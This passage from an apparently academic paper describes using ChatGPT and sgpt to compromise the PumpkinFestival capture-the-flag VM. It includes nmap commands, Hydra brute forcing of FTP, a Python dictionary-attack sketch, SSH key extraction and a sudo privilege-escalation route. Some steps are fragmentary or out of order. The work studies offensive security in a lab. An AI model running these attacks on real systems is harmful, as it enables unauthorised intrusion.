Explanation: sgpt was used to identify the cipher and was then prompted to create a Python script to decode the hash, which was revealed to be a password.
Step 18 - Logging in and retrieving another token.

Upon logging in using the password, the fourth token was immediately found under the Profile page (/wp-admin/profile.php).

Step 19 - Logging in to FTP using rockyou.

Objective: Use the rockyou password list, a list of over 14 million plaintext passwords from a 2009 database leak, to crack the FTP login.

Terminal Input for GenAI:

Step 20 - Login to FTP using the found credentials.

Objective: Utilise previously discovered credentials to log into an FTP server to gain initial access or discover further information about the target system.

Step 21 - Fifth and sixth token plus a mystery file.

    sgpt --shell "what filetype is data.txt"

Terminal Output:

    file data.txt

Explanation: Two tokens were found by traversing the FTP folders, and a mysterious third file named data.txt was also exfiltrated.

Step 23 - Inception extraction of data.

Objective: Conduct further extraction to discover data embedded within the archive.

Terminal Input for GenAI:

Step 24 - Inside the key tar archive is jack.
Explanation: A file within the archive named key was found to be another POSIX tar archive, which was then extracted. It revealed a file named jack which contained 10,106 lines of ASCII text that appeared to be hex values.

Explanation: The final part of this step is to move the OpenSSH private key file into its appropriate location. This is a critical step for gaining authorised access to the target system.

    sgpt --shell "under elevated privilege, change permission ~/.ssh/id_rsa from read-only to read and write for the owner"

    sgpt --chat pentest "after logging into ssh as a standard user, suggest pathways towards privilege escalation"
By finding the local machine's IP address in Step 1, initial connectivity information is established—a crucial part of the planning and reconnaissance stage of the pentesting process. Although passive reconnaissance was not utilised during the experimentation phase, in a real-world pentesting scenario ChatGPT can be used to gather publicly available information about the target. These applications include:

– Searching the web for information related to the target organisation, such as its domain name, IP addresses, employee names, and email addresses.
– Analysing social media profiles of key personnel within the target organisation to identify potential security weak points.
– Reviewing public databases, like WHOIS records, to extract valuable information about the target's domain and IP addresses.
– Identifying the technologies used by the target, including server and client-side software, by examining their public-facing web applications or analysing job postings.

In a paper discussing ChatGPT and reconnaissance [42], prompts were created to extract information from ChatGPT 3.5, although the exact prompts and results were not made available.

Active reconnaissance

Although directly using ChatGPT to interact with the target's systems and networks to gather more detailed information is not possible, mainly due to its policies and because the resulting information may be outdated, it can however be used in the following manner:

– Crafting and sending custom DNS queries to identify subdomains, IP addresses, and mail servers associated with the target (see the sketch after this list).
– Using ChatGPT's natural language processing capabilities to analyse responses from network services like SMTP, FTP, and HTTP, and extract useful information about the target's infrastructure.
– Instructing ChatGPT to generate network scans using tools like Nmap, Nessus or OpenVAS to identify open ports, services, and operating systems on the target's network.
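As a minimal sketch of the first item in the list above, the snippet below resolves a handful of candidate subdomains using only Python's standard library. The domain and the candidate names are placeholders chosen for this illustration, not values from the experiment.

    import socket

    DOMAIN = "example.com"  # placeholder target domain
    CANDIDATES = ["www", "mail", "vpn", "dev", "staging"]  # tiny illustrative wordlist

    def enumerate_subdomains(domain, candidates):
        """Return the candidate subdomains that resolve, with their IP addresses."""
        found = {}
        for name in candidates:
            fqdn = f"{name}.{domain}"
            try:
                found[fqdn] = socket.gethostbyname(fqdn)
            except socket.gaierror:
                continue  # name did not resolve, move on
        return found

    if __name__ == "__main__":
        for fqdn, ip in enumerate_subdomains(DOMAIN, CANDIDATES).items():
            print(f"{fqdn} -> {ip}")

In practice this would be combined with mail and TXT record lookups and cross-checked against the WHOIS data gathered during passive reconnaissance.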
Step 6 to Step 9 demonstrate these capabilities. From inspection of the webpage's source code, uncovering the usernames, discovering URLs and identifying the relevant domain, ChatGPT highlighted the utility and depth of its knowledge base and helped deliver a successful active reconnaissance phase.

While not applicable to the experimentation conducted in Sect. 4.2, ChatGPT can be used to generate a detailed report of the initial findings from the reconnaissance phase, which can be used in the subsequent phases of the penetration test. As seen in "Appendix A", the report includes a summary of the target's profile, identified vulnerabilities, potential attack vectors, and recommendations for further investigation.

5.2 Scanning

In the scanning phase, ChatGPT can be used to aid in performing detailed scans of the target, particularly its network, systems and applications, to identify open ports, services, and potential vulnerabilities. By leveraging its natural language processing (NLP) capabilities and integration with common or publicly available scanning tools, ChatGPT can assist in interpreting the scan output.

Scanning is best exhibited from Step 11 through to Step 14, which started with a vulnerability scan conducted on the Wordpress site using wpscan as well as a gobuster scan performed with a medium wordlist to enumerate directories and files. Step 2 and Step 3 are also applicable to this phase of the process, as the network is probed and open services and ports were discovered.

Define parameters

At the start of the conversation, the necessary parameters can be provided to ChatGPT in a variable-style format which it can then "remember" or store in its memory for the duration of the conversation. For example, the variable [target] can be allocated with the target's IP addresses, [hostname] with the device's NetBIOS name, or [FQDN] with the fully qualified domain name of the target (see Fig. 2). These parameters can be based on the information gathered during the Reconnaissance phase.

5.2.1 Execution

As demonstrated in Fig. 2, ChatGPT can then generate the commands using the defined parameters to perform various scans such as:

– Network scans with Nmap:
This phase of the pentesting process relies more on the analysis of the results from reconnaissance and scanning. Creativity is almost a requirement in finding the inherent vulnerabilities based on the combination of these results. In this regard, ChatGPT can be seen to provide guidance and recommendations on the use of certain tools and techniques. Its competence in deduction and interpretation of the results is also useful. Due to this, it is able to prioritise the vulnerabilities by order of most significant risk or by easiest to crack. It is also able to digest an inordinate amount of text, such as logs, in a fraction of the time compared to manual techniques or even semi-automated tools for summarising the output.

5.4 Exploitation

While ChatGPT proved to be an excellent GenAI tool for pentesting in the previous phases, it shone the brightest in exploiting the vulnerabilities of the remote machine. The various steps that exploited the vulnerabilities discovered are listed below:

Step 4 - anonymous FTP login
Step 5 - accessing the contents of token.txt
Step 15 - retrieval of a token from a discovered file
Step 17 - a coded message was deciphered to yield a password
Step 18 - logging in and retrieving another token
Step 19 - using the rockyou password list to crack the FTP login
Step 20 - utilising the discovered credentials to login to the FTP server

Exploit selection. In Step 28, ChatGPT was able to identify and suggest potential exploits that were most appropriate given the chat history and, by doing so, took full advantage of the earlier identified vulnerabilities.

Customised exploits. In the case of decoding a base62-encoded string as shown in Step 17, the Python script it created in a matter of seconds was simple yet completely effective. That is all that matters: a tool that does the job, and almost instantaneously at that.

Step 29 represented the culmination of the exploitation phase, as ChatGPT crafted the final exploit based on the previously identified pathways, ultimately resulting in privilege escalation.

5.5.1 Automated report generation

The generation of the Penetration Testing Report in "Appendix A" relied on the key strength of LLMs—the ability to generate human-like text based on the input given; in this case, the prompts and responses and the entire body of results output from its suggested commands. It was able to summarise concisely the steps taken to root the machine and presents this in the Test Methodology and Detailed Findings sections of the report. Its Recommendations were also accurate. Coupled with other tools, such as visualisation software, it could potentially generate other forms of data representation to be included in the report and help make it more understandable or actionable for the client.
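A rough sketch of how such report generation could be automated is shown below. It assumes the OpenAI Python client interface that was current at the time of the experiment (openai.ChatCompletion.create with the gpt-3.5-turbo model); the file names and prompt wording are illustrative rather than those used in the paper, and long outputs would need to be chunked to fit the model's context window.

    import openai  # assumes the 2023-era OpenAI Python client

    openai.api_key = "YOUR_API_KEY"  # placeholder

    def generate_report(output_files):
        """Summarise collected tool output into a structured pentest report."""
        evidence = ""
        for path in output_files:
            with open(path, encoding="utf-8", errors="replace") as fh:
                evidence += f"\n--- {path} ---\n{fh.read()}"

        prompt = (
            "You are assisting with an authorised penetration test. "
            "From the tool output below, write a report with the sections "
            "Executive Summary, Test Methodology, Detailed Findings and "
            "Recommendations.\n" + evidence
        )
        response = openai.ChatCompletion.create(
            model="gpt-3.5-turbo",
            messages=[{"role": "user", "content": prompt}],
        )
        return response["choices"][0]["message"]["content"]

    if __name__ == "__main__":
        # Hypothetical evidence files gathered during the engagement.
        print(generate_report(["nmap.txt", "wpscan.txt"]))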
5.5.2 Customisation and quality

The reporting format can vary widely for every target and for every client. ChatGPT could be used to customise the report based on the specifications of the client, the nature of the test, and its findings. Quality-wise, it can produce an accurate, complete and polished report, given ChatGPT's ability to check for errors and inconsistencies and identify areas that need clarification.

6 Conclusion

GenAI and LLMs have the potential to revolutionise pentesting, offering numerous benefits such as improved efficiency, enhanced creativity, customised testing environments, and continuous learning and adaptation. However, their application in this domain is double-edged, presenting novel challenges and limitations, such as overreliance on AI and potential model bias or fairness issues, notwithstanding the ethical and legal concerns.

Moreover, the use of GenAI in pentesting can lead to potential risks and unintended consequences, including its use in generating polymorphic malware, escalation of cyber threats, advanced persistent threats, and uncontrolled AI development.

To address these concerns, organisations must adopt best practices and guidelines, focusing on responsible AI deployment, data security and privacy, and fostering collaboration and information sharing. Governments should strike a balance between limiting its negative applications and not hindering its potential.

In conclusion, GenAI does offer promising opportunities for enhancing the effectiveness of pentesting and ultimately improving the cyber security posture of organisations.
While the experimentation was successful in completing its objective of fully compromising the remote machine, it is essential for stakeholders to carefully consider potential challenges, risks, and unintended consequences associated with its use. The key is to adopt responsible practices to ensure that the benefits of the technology are realised while minimising the potential downsides. By doing so, organisations can leverage the power of GenAI to better protect themselves against the ever-evolving threat landscape and maintain a secure digital environment for all.

7 Future works

Future works identified as having the potential to advance the research and experiments conducted in this paper, and the field of GenAI and pentesting in general, are briefly discussed in this section.
Auto-GPT [40] is an open-source, Python-based tool that makes GPT-4 completely autonomous, using subprocesses of GPT-4 to break down and achieve the objective a user sets. It has the most potential for advancing research in this field: in theory, a single prompt to "pentest a target machine" is all that is required. The project was released only about two weeks after OpenAI's GPT-4 release on 14 March 2023 and quickly became the top trending repository on GitHub. Although it currently suffers from issues such as "hallucinations", many users continue to find uses for the project.
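As an illustration of the direction this points to, rather than of anything evaluated in this paper, the sketch below shows how a single objective and the findings gathered so far might be handed to an LLM that proposes the next action. It assumes the pre-1.0 openai Python package (the ChatCompletion interface current at the time of writing), the gpt-3.5-turbo model, and an API key supplied through the environment; the prompt wording is illustrative only.

# Illustrative sketch only: seeding a "suggest the next step" interaction from a
# single objective, in the spirit of Auto-GPT and sgpt. Assumes the pre-1.0
# "openai" package and the OPENAI_API_KEY environment variable.
import os
import openai

openai.api_key = os.environ["OPENAI_API_KEY"]

objective = "Pentest the lab VM at 10.0.2.15 (an authorised, self-hosted CTF target)."
findings = "Nmap shows port 21 (FTP, anonymous login allowed) and port 80 (HTTP) open."

response = openai.ChatCompletion.create(
    model="gpt-3.5-turbo",
    messages=[
        {"role": "system",
         "content": "You are assisting an authorised penetration test in a lab."},
        {"role": "user",
         "content": f"Objective: {objective}\nFindings so far: {findings}\n"
                    "Suggest the single next command to run, with a one-line rationale."},
    ],
)

print(response["choices"][0]["message"]["content"])

Chaining such calls, feeding each command's output back in as new findings, is essentially the loop that Auto-GPT automates.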
In addressing concerns regarding privacy and confidentiality, integrating sgpt with privateGPT [20], a tool that uses GPT for private interaction with documents, is one realistic body of work identified.

Funding Open Access funding enabled and organized by CAUL and its Member Institutions.

Data Availability We do not analyse or generate any data-sets, because our work proceeds within a virtual machine environment. One can obtain the relevant materials from the reference [21].

Declarations

Conflict of interest The authors declare that there are no conflicts of interest.

Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article's Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article's Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/.

Appendix A: Penetration testing report

Appendix A.1: Executive summary

The penetration test was conducted on a virtual machine called "PumpkinFestival". The objective of the test was to identify vulnerabilities and exploit them to gain unauthorised access to the system. The test was successful in achieving its objective. The vulnerabilities identified and exploited included an anonymous FTP login, a WordPress site with multiple users, and misconfigured sudo rights for a user.

Appendix A.2: Test methodology

1. Initial Reconnaissance The initial scan was conducted using Nmap, which revealed FTP on port 21 allowing anonymous login. The first PumpkinToken was found on the FTP server.
2. HTTP and FTP Exploration The HTTP website was explored, revealing another PumpkinToken hidden in the source code. The /tokens/ and /users/ directories were forbidden, and the /wordpress/ directory returned a 404 error. A note was found in /store/track.txt, hinting at a local domain (pumpkins.local) and an email address ([email protected]).
3. Domain Manipulation and WordPress Scanning The /etc/hosts file was edited to include the line "192.168.1.109 pumpkins.local", which allowed access to a WordPress site when visiting pumpkins.local. Another PumpkinToken was found on this site. A WordPress scan revealed two users and several vulnerabilities, but all required authentication or were not useful.
4. FTP Revisited and Bruteforce Attack A hint from the author suggested revisiting the FTP. The name "Harry" was found in the initial note, and a bruteforce attack using Hydra revealed the password for the user "Harry". This led to another directory named "Donotopen", containing another PumpkinToken and a file named data.txt. (An illustrative sketch of this dictionary attack is shown after this list.)
5. Binary File and Private Key Extraction The data.txt file contained binary data, which turned out to be a tar file. This file contained a file named "jack", which was a hex-encoded private key for the user "Jack". This allowed SSH login into Jack's account.
6. Further Enumeration and Token Extraction Running an enumeration script revealed some users and SUID binaries. Running the token SUID binary printed out another PumpkinToken.
7. HTTP Revisited and Directory Enumeration HTTP was revisited with directory enumeration using Gobuster. A readme.html file was found containing a base62-encoded string, which decoded to a password for the users "morse" and "jack".
8. WordPress Login and Privilege Escalation The password was used to log into the WordPress dashboard. Although there was no theme editor, the password was used to check Jack's sudo rights. Jack was able to run a non-existent file /home/jack/pumpkin/alohomora, which was created with a bash shell script. Running this file as sudo gave root access.
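Step 4 above relied on Hydra. Purely to illustrate what that dictionary attack does, the following is a minimal Python sketch using only the standard library; the target address is the one recorded in the report, the username is the one identified in the note, and the candidate passwords stand in for a real word list such as rockyou.txt.

# Minimal sketch of the FTP dictionary attack that Hydra automated in step 4.
import ftplib

TARGET = "192.168.1.109"                       # VM address as recorded in the report
USER = "harry"                                 # username identified in the note ("Harry")
CANDIDATES = ["pumpkin", "festival", "harry2019"]  # placeholder word list

def ftp_login_works(host: str, user: str, password: str) -> bool:
    """Return True if the FTP server accepts the given credentials."""
    try:
        with ftplib.FTP(host, timeout=5) as ftp:
            ftp.login(user, password)
            return True
    except ftplib.error_perm:                  # 530: login incorrect
        return False
    except OSError:                            # connection problems
        return False

for candidate in CANDIDATES:
    if ftp_login_works(TARGET, USER, candidate):
        print(f"Valid credentials found: {USER}:{candidate}")
        break

Hydra performs the same loop in parallel and against many protocols, which is why it was the tool used during the test.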
Appendix A.3: Detailed findings

1. Network Scanning The local machine's IP address was identified using the command
ip addr show | grep "inet " | awk '{print $2}' | cut -d '/' -f1
The network was probed using the command
nmap -sn 10.0.2.0/24
and the remote machine was scanned using
nmap -A -p- 10.0.2.15
2. FTP Exploitation An FTP service running on the remote machine allowed for anonymous login.
The scan revealed two users, admin and morse. A gobuster scan was also conducted to further enumerate the WordPress site.
5. SSH Exploitation A file named jack was identified to contain hex values, which were decoded to reveal an OpenSSH private key (a sketch of this decoding follows this list). The key was used to log in to the SSH server on port 6880 as the user jack. The user's privileges were listed using sudo -l.
6. Privilege Escalation The user jack was found to have sudo rights to run /home/jack/pumpkin/alohomora. Since this file did not exist, it was created with a shell script and run with sudo to gain a root shell.
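The decoding in finding 5 can be reproduced with a few lines of Python. The sketch below assumes data.txt is in the working directory and that the jack member sits at the root of the archive; the output file name is illustrative.

# Minimal sketch of finding 5: unpack data.txt (a tar archive) and turn the
# hex-encoded "jack" member into a usable OpenSSH private key file.
import os
import tarfile

with tarfile.open("data.txt") as archive:
    archive.extractall(path="extracted")       # CTF content, treated as trusted here

with open("extracted/jack") as hex_file:       # hex characters, possibly with whitespace
    hex_text = "".join(hex_file.read().split())

with open("jack_id_rsa", "wb") as key_file:
    key_file.write(bytes.fromhex(hex_text))

os.chmod("jack_id_rsa", 0o600)                 # ssh refuses keys with loose permissions

# The key can then be used as described in the report:
#   ssh -i jack_id_rsa -p 6880 jack@<target address>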
Appendix A.4: Recommendations

The identified vulnerabilities should be addressed to improve the security posture of the system. Specifically:

1. Strengthen password policies to prevent brute force attacks.
2. Disable anonymous FTP login to prevent unauthorised access to files.
3. Regularly update the WordPress site and its plugins to patch known vulnerabilities.
4. Implement proper input validation to prevent hidden injection attacks.
5. Restrict sudo rights to only necessary commands for each user.
6. Regularly review and update user privileges, and correct file and directory permissions.
International Scientific Conference On Information Technology and Data Related Research, pp. 229–234 (2019)
3. Aggarwal, G.: Harnessing GenAI: Building Cyber Resilience Against Offensive AI. Forbes (2023). https://www.forbes.com/sites/forbestechcouncil/2023/09/25/harnessing-genai-building-cyber-resilience-against-offensive-ai/?sh=775c8fa08ed0
4. AttackIQ: AttackIQ Ready!. https://www.attackiq.com/platform/attackiq-ready (2023). Accessed 2 May 2023
5. Avgerinos, T., Brumley, D., Davis, J., Goulden, R., Nighswander, T., Rebert, A., Williamson, N.: The Mayhem cyber reasoning system. IEEE Secur. Priv. 16, 52–60 (2018). https://doi.org/10.1109/msp.2018.1870873
6. Ben-Moshe, S., Gekker, G., Cohen, G.: OpwnAI: AI That Can Save the Day or HACK it Away. Check Point Research (2023). https://research.checkpoint.com/2022/opwnai-ai-that-can-save-the-day-or-hack-it-away
7. BlackBerry Ltd: ChatGPT May Already Be Used in Nation State Cyberattacks, Say IT Decision Makers in BlackBerry Global Research. https://www.blackberry.com/us/en/company/newsroom/press-releases/2023/chatgpt-may-already-be-used-in-nation-state-cyberattacks-say-it-decision-makers-in-blackberry-global-research (2023). Accessed 4 May 2023
8. Chen, J., Hu, S., Zheng, H., Xing, C., Zhang, G.: GAIL-PT: an intelligent penetration testing framework with generative adversarial imitation learning. Comput. Secur. 126, 103055 (2023)
9. Cunningham, A.: Microsoft could offer private ChatGPT to businesses for "10 times" the normal cost. Ars Technica (2023). https://arstechnica.com/information-technology/2023/05/report-microsoft-plans-privacy-first-chatgpt-for-businesses-with-secrets-to-keep. Accessed 4 May 2023
10. CyCraft Technology Corp: CyCraft's Fuchikoma at Code Blue 2019: The Modern-Day Ghost in the Shell. https://cycraft.com/cycrafts-fuchikoma-at-code-blue-2019-the-modern-day-ghost-in-the-shell (2019). Accessed 2 May 2023
11. CyCraft Technology Corp: How to Train a Machine Learning Model to Defeat APT Cyber Attacks, Part 2: Fuchikoma VS CyAPTEmu: The Weigh-In (2020). https://medium.com/@cycraft_corp/how-to-train-a-machine-learning-model-to-defeat-apt-cyber-attacks-part-2-fuchikoma-vs-cyaptemu-f689a5df5541
12. Deng, G.: PentestGPT (2023). https://github.com/GreyDGL/PentestGPT
13. Europol: The criminal use of ChatGPT - a cautionary tale about large language models. https://www.europol.europa.eu/media-press/newsroom/news/criminal-use-of-chatgpt-cautionary-tale-about-large-language-models (2023). Accessed 4 May 2023
14. Gal, U.: ChatGPT is a data privacy nightmare. https://theconversation.com/chatgpt-is-a-data-privacy-nightmare-if-youve-ever-posted-online-you-ought-to-be-concerned-199283 (2023). Accessed 4 May 2023
15. Grbic, D., Dujlovic, I.: Social engineering with ChatGPT. In: 22nd International Symposium INFOTEH-JAHORINA (INFOTEH), pp. 1–5 (2023)
16. Greshake, K., Abdelnabi, S., Mishra, S., Endres, C., Holz, T., Fritz, M.: More than you've asked for: A Comprehensive Analysis of Novel Prompt Injection Threats to Application-Integrated Large Language Models (2023). https://ui.adsabs.harvard.edu/abs/2023arXiv230212173G
17. Gupta, M., Akiri, C., Aryal, K., Parker, E., Praharaj, L.: From ChatGPT to ThreatGPT: Impact of generative AI in cybersecurity and privacy. IEEE Access (2023)
18. Gurman, M.: Samsung Bans Staff's AI Use After Spotting ChatGPT Data Leak. Bloomberg (2023). https://www.bloomberg.com/news/articles/2023-05-02/samsung-bans-chatgpt-and-other-generative-ai-use-by-staff-after-leak#xj4y7vzkg
19. Hern, A., Milmo, D.: AI chatbots making it harder to spot phishing emails, say experts. The Guardian (2023). https://www.theguardian.com/technology/2023/mar/29/ai-chatbots-making-it-harder-to-spot-phishing-emails-say-experts
20. Imartinez: privateGPT. https://github.com/imartinez/privateGPT (2023). Accessed 4 Jun 2023
21. Jayanth: Mission-Pumpkin v1.0: PumpkinFestival. https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkinfestival,329/ (2019). Accessed 4 May 2023
22. Khan, S., Kabanov, I., Hua, Y., Madnick, S.: A systematic analysis of the Capital One data breach: critical lessons learned. ACM Trans. Priv. Secur. (2022). https://doi.org/10.1145/3546068
23. Mansfield-Devine, S.: Weaponising ChatGPT. Netw. Secur. (2023)
24. McDaniel, L., Talvi, E., Hay, B.: Capture the flag as cyber security introduction. In: 2016 49th Hawaii International Conference on System Sciences (HICSS), pp. 5479–5486 (2016)
25. Microsoft: Microsoft and OpenAI extend partnership. https://blogs.microsoft.com/blog/2023/01/23/microsoftandopenaiextendpartnership (2023). Accessed 4 May 2023
26. Montalbano, E.: ChatGPT Hallucinations Open Developers to Supply Chain Malware Attacks. Dark Reading (2023). https://www.darkreading.com/application-security/chatgpt-hallucinations-developers-supply-chain-malware-attacks
27. Morpheuslord: GPT_Vuln-analyzer. https://github.com/morpheuslord/GPT_Vuln-analyzer (2023). Accessed 4 May 2023
28. Offensive Security: Get Kali | Kali Linux. https://www.kali.org/get-kali/#kali-virtual-machines (2023). Accessed 4 Jun 2023
29. OpenAI: ChatGPT - Release Notes. https://help.openai.com/en/articles/6825453-chatgpt-release-notes (2023). Accessed 14 Oct 2023
30. OpenAI: OpenAI and Microsoft extend partnership. https://openai.com/blog/openai-and-microsoft-extend-partnership (2023). Accessed 4 May 2023
31. OpenAI: Usage policies. https://openai.com/policies/usage-policies (2023). Accessed 4 May 2023
32. Papernot, N., McDaniel, P., Goodfellow, I., Jha, S., Celik, Z., Swami, A.: Practical black-box attacks against machine learning. In: Proceedings of the 2017 ACM on Asia Conference on Computer and Communications Security, pp. 506–519 (2017)
33. Petro, D., Morris, B.: Weaponizing machine learning: Humanity was overrated anyway. DEF CON, vol. 25 (2017)
34. Prasad, S., Sharmila, V., Badrinarayanan, M.: Role of Artificial Intelligence based Chat Generative Pre-trained Transformer (ChatGPT) in Cyber Security. In: 2023 2nd International Conference on Applied Artificial Intelligence and Computing (ICAAIC), pp. 107–114 (2023)
35. Renaud, K., Warkentin, M., Westerman, G.: From ChatGPT to HackGPT: Meeting the Cybersecurity Threat of Generative AI. MIT Sloan Management Review (2023)
36. Sanjaya, I., Sasmita, G., Arsa, D.: Information technology risk management using ISO 31000 based on ISSAF framework penetration testing (Case Study: Election Commission of X City). Int. J. Comput. Netw. Inf. Secur. 12 (2020)
37. Scherb, C., Heitz, L., Grimberg, F., Grieder, H., Maurer, M.: A serious game for simulating cyberattacks to teach cybersecurity. arXiv:2305.03062 (2023)
38. Shimony, E., Tsarfati, O.: Chatting Our Way Into Creating a Polymorphic Malware. https://www.cyberark.com/resources/threat-research-blog/chatting-our-way-into-creating-a-polymorphic-malware (2023). Accessed 4 May 2023
39. Siemens Energy: DeepArmor® Industrial. https://assets.siemens-energy.com/siemens/assets/api/uuid:48023aeb-6592-46ae-bf7c-0353c0653fe6/siemensenergycybersecuritybrochure-deeparmour-industrial210429.pdf (2023). Accessed 2 May 2023
40. Significant-Gravitas: Auto-GPT. https://github.com/Significant-Gravitas/Auto-GPT (2023). Accessed 4 Jun 2023
41. Takaesu, I.: DeepExploit: Fully automatic penetration test tool using machine learning. Black Hat (2018)
42. Temara, S.: Maximizing Penetration Testing Success with Effective Reconnaissance Techniques using ChatGPT. Research Square Platform LLC (2023). https://doi.org/10.21203/rs.3.rs-2707376/v1. Accessed 4 Jun 2023
43. TheR1D: ShellGPT. https://github.com/TheR1D/shell_gpt (2023). Accessed 4 May 2023
44. Zacharakos, A.: How hackers can abuse ChatGPT to create malware. TechTarget Security (2023). https://www.techtarget.com/searchsecurity/news/365531559/How-hackers-can-abuse-ChatGPT-to-create-malware
45. Zhuo, T., Huang, Y., Chen, C., Xing, Z.: Exploring AI ethics of ChatGPT: a diagnostic analysis. arXiv:2301.12867 (2023)

Publisher's Note Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.